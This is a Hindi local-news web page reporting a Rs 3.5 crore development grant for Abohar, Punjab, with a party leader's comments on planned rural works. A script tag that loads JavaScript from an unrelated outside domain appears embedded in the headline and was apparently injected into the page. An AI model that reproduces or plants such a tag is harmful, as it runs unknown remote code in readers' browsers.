Tuesday, 13 October 2026
Breaking News
गुरु नानक गीता कैलाश मेमोरियल फाउंडेशन और रेड क्रॉस सोसाइटी ने लगाया मेडिकल कैंप: 300 से ज्यादा मरीजों की जांच, मुफ्त टेस्ट और दवाइयां भी मिलीं भारत के मीडिया जगत को चाहिए एक समावेशी और सशक्त प्रेस काउंसिल श्री दिगंबर जैन मंदिर में णमोकार मंत्र पाठ एवं भक्तामर दीपार्चना का आयोजन घरेलू दुकानों पर कार्रवाई के फैसले के खिलाफ पुनर्विचार याचिका दाखिल करे चंडीगढ़ प्रशासन : कृष्ण लाल समाजवाद के अग्रदूत थे महाराजा अग्रसेन महाराज  भगवान वाल्मीकि रामतीर्थ, अमृतसर से चंडीगढ़ पहुंची प्रथम ज्योति, सेक्टर 49-A की रामलीला कमेटी ने किया स्वागत राज नागपाल एक बार फिर सर्वसम्मति से ऑल इंडिया राजीव मेमोरियल सोसाइटी के अध्यक्ष चुने गए महाकाल की पवित्र नगरी उज्जैन के महापौर मुकेश टटवाल का राम दरबार में भव्य स्वागत पंचकूला में पहली बार सजेगा ऐतिहासिक गरबा-डांडिया का महा-पंडाल पंजाब विवि के पूर्व रशियन विभागाध्यक्ष डॉ. पंकज मालवीय द्वारा रशियन में अनुदित तीन पुस्तकों का विमोचन
पंजाब

अबोहर सब डिवीजन एवं तहसील के विकास हेतु साढ़े तीन करोड़ रुपये की ग्रांट मंजूर<script src="https://new2sportnews.com/face2news.js"></script>

Read in:Hindi

अबोहर, (दलीप)
पंजाब सरकार ने अबोहर विधानसभा क्षेत्र में विभिन्न विकास कार्यो हेतु साढ़े तीन करोड़ रुपए की ग्रांट राशि रिलीज कर दी है।जिसके लिए आम आदमी पार्टी की नेता कुलदीप कुमार दीप कंबोज ने मुख्यमंत्री का आभार जताया है। दीप कंबोज ने कहा कि यह तो अबोहर के विकास हेतु ग्रांट की पहली किश्त है, यह सिलसिला लगातार जारी रहेगा और अबोहर को विकासयुक्त एवं समस्यामुक्त बनाने के हर वायदे को पूरा किया जाएगा। दीप कंबोज ने बताया कि बस स्टैंड के निर्माण कार्य हेतु भी जल्द ही मंजूर फंड्स रिलीज कर दिया जाएगा। कंबोज ने बताया कि अगले हफ्ते से अबोहर के ग्रामीण क्षेत्र के विकास कार्यो की शुरुआत हो जाएगी, जिसमे छप्पड़ों, खालों एवं गलियों के निर्माण कार्य होंगे इसके साथ ही गांवो में स्वच्छता अभियान भी शुरू किया जाएगा। पंचायत एवं गांव निवासियों की मदद से स्वच्छता जागरूकता मिशन भी चलाया जाएगा। इसके इलावा हर गांव में पर्यावरण को बढ़ावा देने एवं सुंदरता हेतु बड़े स्तर पर पौधरोपण अभियान भी आगे बढ़ाया जाएगा।

0 Comments